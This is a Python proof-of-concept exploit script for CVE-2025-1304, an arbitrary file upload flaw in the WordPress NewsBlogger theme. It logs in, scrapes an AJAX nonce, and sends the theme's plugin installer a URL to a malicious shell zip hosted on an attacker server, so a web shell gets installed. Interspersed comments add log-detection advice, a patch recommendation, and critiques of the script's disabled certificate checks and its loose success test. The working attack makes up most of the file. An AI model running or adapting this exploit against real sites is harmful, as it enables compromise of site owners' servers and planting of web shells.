POC / CVE-2025-1304.py PY
import requests
import re
import argparse

# By : Nxploited (Khaled Alenazi)

# Command-line interface. All four options are mandatory: the target site's
# base URL, a WordPress account to authenticate with, and the URL of a zip
# archive that is later passed to the theme's plugin installer.
# The password is read from argv, so it ends up in shell history and is
# visible in the process list while the script runs.
parser = argparse.ArgumentParser(
    description="WordPress NewsBlogger Theme Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)"
)
for long_opt, short_opt, help_text in (
    ('--url', '-u', 'Target base URL (e.g., http://localhost/wordpress)'),
    ('--username', '-un', 'WordPress admin username'),
    ('--password', '-p', 'WordPress admin password'),
    ('--shellweb', '-shell', 'Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)'),
):
    # Every option is registered the same way: long flag, short flag, required.
    parser.add_argument(long_opt, short_opt, required=True, help=help_text)
args = parser.parse_args()

# HTTP client setup.
# A fixed browser-like User-Agent string; it is passed explicitly on the two
# POST requests further down.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

# Certificate verification is turned off for every request made through this
# session, and the urllib3 warnings that would report it are silenced. The
# server is therefore not authenticated: the WordPress credentials and session
# cookies sent below can be read or altered by anyone on the network path.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False

# Step 1: authenticate through the standard WordPress login form so that the
# session carries the cookies needed for the /wp-admin/ requests that follow.
login_url = f"{args.url}/wp-login.php"
print(f"[+] Logging in to {login_url}")
login_form = {
    'log': args.username,
    'pwd': args.password,
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}
# No timeout is given, so an unresponsive host blocks the script indefinitely.
response = session.post(login_url, data=login_form, headers={"User-Agent": user_agent})

# The script treats any cookie whose name contains "wordpress_logged_in" as
# proof that the login worked; the HTTP status and response body are ignored.
cookie_names = [cookie.name for cookie in session.cookies]
if not any('wordpress_logged_in' in name for name in cookie_names):
    print("[-] Failed to log in.")
    exit()
print("[+] Logged in successfully.")

# Step 2: load the NewsBlogger welcome page with the authenticated session and
# read the AJAX nonce that the page embeds in its HTML/JavaScript.
# A WordPress nonce is a CSRF token, not an authorization check: the page hands
# it to the logged-in session that renders it, so the server-side AJAX handler
# still has to verify the caller's capability on its own.
welcome_url = f"{args.url}/wp-admin/admin.php?page=newsblogger-welcome"
print(f"[+] Fetching welcome page to extract nonce: {welcome_url}")
welcome_resp = session.get(welcome_url)

# Tried in order, from the most specific form (inside the pluginInstallerAjax
# object) to the loosest; the first pattern that matches supplies the nonce.
nonce_patterns = [
    r'pluginInstallerAjax\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]+)"',
    r'"nonce"\s*:\s*"([a-zA-Z0-9]+)"',
    r'nonce\s*=\s*"([a-zA-Z0-9]+)"',
    r'nonce":"([a-zA-Z0-9]+)"'
]

nonce = None
for pattern in nonce_patterns:
    found = re.search(pattern, welcome_resp.text)
    if found:
        nonce = found.group(1)
        break

# Stop when no pattern matched the page.
if not nonce:
    print("[-] Failed to extract nonce. Try visiting the welcome page and inspect manually.")
    exit()

print(f"[+] Extracted nonce: {nonce}")

# Step 3: call the theme's plugin-installer AJAX action with a caller-supplied
# download URL (the file is labelled CVE-2025-1304).
#
# Detection: in web-server or WAF logs this is a POST to
# /wp-admin/admin-ajax.php whose form body carries
# action=newsblogger_install_activate_plugin together with a plugin_url
# parameter. A plugin_url pointing at a host the site owner does not recognise
# is the field to alert on.
# Mitigation: update the NewsBlogger theme to a release that fixes this CVE.
# NOTE(review): the handler's code is not shown here; a correct handler would
# be expected to check current_user_can('install_plugins') and to refuse
# arbitrary download URLs -- confirm against the vendor advisory.
ajax_url = f"{args.url}/wp-admin/admin-ajax.php"
payload = {
    'action': 'newsblogger_install_activate_plugin',
    'plugin_url': args.shellweb,
    'plugin_slug': 'spice-starter-sites',
    '_ajax_nonce': nonce
}
# Headers imitate the XMLHttpRequest that the welcome page itself would send.
ajax_headers = {
    "User-Agent": user_agent,
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": welcome_url
}
print(f"[+] Sending malicious plugin URL to: {ajax_url}")
exploit_resp = session.post(ajax_url, headers=ajax_headers, data=payload)

print("[+] Server response:")
print(exploit_resp.text)

# The verdict below is a loose substring test: any body containing "success"
# in any letter case counts, which includes a constructed example such as
# {"success":false}. The printed result is therefore not reliable evidence
# either way; check the site's plugin directory and logs instead.
body = exploit_resp.text
looks_ok = "Plugin activated" in body or "success" in body.lower()
if not looks_ok:
    print("[-] Exploit may have failed or response needs manual review.")
else:
    print("\nExploit executed successfully.")